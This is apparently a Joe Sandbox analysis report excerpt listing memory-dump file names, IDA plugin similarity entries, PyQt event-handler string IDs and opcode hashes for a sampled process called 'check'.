                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Entry@Event@@@State@@
                                                                                                                                                                                                                • String ID: BJ9$QThreadPool$connectNotify$connectNotify(self, signal: QMetaMethod)
                                                                                                                                                                                                                • API String ID: 1816429982-1566588677
                                                                                                                                                                                                                • Opcode ID: f20f379f5496028ed71174707a8e0aef65fd1f1aabd38dc14921f6bd7a44559f
                                                                                                                                                                                                                • Instruction ID: 227a20f76231871dd726d1e85208d2843c74fa6b5e33acf3ed021b6e1b691e5f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f20f379f5496028ed71174707a8e0aef65fd1f1aabd38dc14921f6bd7a44559f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38214FB2A09B46C6EB408F25E8446AA77B4FB84BC4F580132DA8D13B78EF7DD459C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Entry@Event@@@State@@
                                                                                                                                                                                                                • String ID: BJ8$QProcess$customEvent$customEvent(self, a0: Optional[QEvent])
                                                                                                                                                                                                                • API String ID: 1816429982-4034414158
                                                                                                                                                                                                                • Opcode ID: dd59b3b2cae3a4d0472270b05f27df06fb15bf7c862bd9b8f71e98191bd1b6e2
                                                                                                                                                                                                                • Instruction ID: 6a60129893e87248d72b6cca81d461f39ae5a3dcc49b29276832536e3b4cab6a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd59b3b2cae3a4d0472270b05f27df06fb15bf7c862bd9b8f71e98191bd1b6e2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 282130B2A09B4686EE409F25E98466A77B4FB84B80F584136DA8D13738EF7CD054C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Entry@Event@@@Machine@@State
                                                                                                                                                                                                                • String ID: BJ8$QStateMachine$onEntry$onEntry(self, event: Optional[QEvent])
                                                                                                                                                                                                                • API String ID: 4060738954-4269694997
                                                                                                                                                                                                                • Opcode ID: 9d2d1de1cd713d18269cb4660ba5f7b0c455ddf5501125f9818cb6ff7b8664e9
                                                                                                                                                                                                                • Instruction ID: ef07382b6c70d5d456eafa5b52e7c0a394dd97b18a0a667650ef4c2ad92a858a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d2d1de1cd713d18269cb4660ba5f7b0c455ddf5501125f9818cb6ff7b8664e9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A212CB2A0DB4685EB408B25E548ABA77A4FB88B84F580132DA8D53738EF7CD048C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Entry@Event@@@State@@
                                                                                                                                                                                                                • String ID: BJ8$QMimeData$childEvent$childEvent(self, a0: Optional[QChildEvent])
                                                                                                                                                                                                                • API String ID: 1816429982-845637078
                                                                                                                                                                                                                • Opcode ID: fd503f1dbad4cdeec6f82883c3b7c05556a2196c8d7c6fc239423b4727c26d04
                                                                                                                                                                                                                • Instruction ID: 027a7ccd14e0dda2d80255b7fb06f5e78e7779561f0a917beff35340c468dcf5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fd503f1dbad4cdeec6f82883c3b7c05556a2196c8d7c6fc239423b4727c26d04
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4213DB2A09B46C5EA408F25E984A6A77A4FB84FC0F180136DA8D13778EF7CD449C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Entry@Event@@@State@@
                                                                                                                                                                                                                • String ID: BJ8$QStringListModel$childEvent$childEvent(self, a0: Optional[QChildEvent])
                                                                                                                                                                                                                • API String ID: 1816429982-3604178514
                                                                                                                                                                                                                • Opcode ID: 00e859709e44f1309acba5b6edfb1913dc9089dda72b77dd7e75130fbda81e63
                                                                                                                                                                                                                • Instruction ID: 6830bac4c7a7d1c41fb7b061bc576f2daf7ebf5aaeb514623c624dbc430312a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00e859709e44f1309acba5b6edfb1913dc9089dda72b77dd7e75130fbda81e63
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 38213DB2A09B46C6EA408F35E88466A77B4FB84B80F584132DA8D53778EF7CD458D700
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Entry@Event@@@State@@
                                                                                                                                                                                                                • String ID: BJ8$QConcatenateTablesProxyModel$customEvent$customEvent(self, a0: Optional[QEvent])
                                                                                                                                                                                                                • API String ID: 1816429982-1731479332
                                                                                                                                                                                                                • Opcode ID: 3fef3e85346e587b6f85ea46edb17a1459d1909be220d41280d80c53e22d9efa
                                                                                                                                                                                                                • Instruction ID: fb7b66c08f7f63f519ae61c96440ac21d855bacd551ca916f02716d08f3549d5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fef3e85346e587b6f85ea46edb17a1459d1909be220d41280d80c53e22d9efa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 932130B2A09F46C6EA418F25F48866A77B5FB84B80F580132DA8D13B38EF7CD158C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Entry@Event@@@State@@
                                                                                                                                                                                                                • String ID: BJ8$QItemSelectionModel$childEvent$childEvent(self, a0: Optional[QChildEvent])
                                                                                                                                                                                                                • API String ID: 1816429982-3443507175
                                                                                                                                                                                                                • Opcode ID: f560f7a83c45505113e3f513f6745b15f5766d74b4714004c753d7f8987371ab
                                                                                                                                                                                                                • Instruction ID: 539a8f8ff599dc6679103055bd46fd1665d139954976f36bc7d0bc6c7824a1c0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f560f7a83c45505113e3f513f6745b15f5766d74b4714004c753d7f8987371ab
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05213DB6A09B46C5EA419F25E89866A77B4FB94B80F184132DA8D13B78EF7CD448C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Entry@Event@@@State@@
                                                                                                                                                                                                                • String ID: BJ8$QPauseAnimation$timerEvent$timerEvent(self, a0: Optional[QTimerEvent])
                                                                                                                                                                                                                • API String ID: 1816429982-1409084940
                                                                                                                                                                                                                • Opcode ID: 3a604f9b4846df6ff500f037649ee408b6d0bf2e045610ca11b3761e45888785
                                                                                                                                                                                                                • Instruction ID: f780d5e3f83c513a4d29bb5f72664ee12cd1d0bf96f9dc0acab1d488af048fc7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3a604f9b4846df6ff500f037649ee408b6d0bf2e045610ca11b3761e45888785
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30210CB2A09B4686EB40CF25E84466A77A4FB84B84F580132DA8D53738EF7CD459C740
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242516989.00007FFB0311C000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242591418.00007FFB0311F000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242653442.00007FFB03133000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242704074.00007FFB03140000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242751484.00007FFB03145000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242815895.00007FFB03147000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242883228.00007FFB03148000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242921313.00007FFB0314B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7ffb02f10000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Entry@Event@@@State@@
                                                                                                                                                                                                                • String ID: BJ8$QSequentialAnimationGroup$timerEvent$timerEvent(self, a0: Optional[QTimerEvent])
                                                                                                                                                                                                                • API String ID: 1816429982-2137686484
                                                                                                                                                                                                                • Opcode ID: 41c1a99b03bb9ffddf166dc2c4920c957132b4d1ebdd3b85e81912784b1ab0f5
                                                                                                                                                                                                                • Instruction ID: 0cc387500efd559a8d374b0aade022a5390e40033e95c7c8c50f9088b57aa3b1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41c1a99b03bb9ffddf166dc2c4920c957132b4d1ebdd3b85e81912784b1ab0f5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3217FB2A09B46D6EB409B35E4846AA77B4FF84B80F580132DA8D53774EF7CD048C744
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2241562540.00007FFB02F11000.00000020.00000001.01000000.00000011.sdmp, Offset: 00007FFB02F10000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241498311.00007FFB02F10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2241992384.00007FFB03064000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242170383.00007FFB03100000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242253395.00007FFB03107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242309506.00007FFB03108000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242374254.00007FFB03109000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2242472236.00007FFB0311A000.00000008.00000001.01000000.00000011.sdmpDownload File
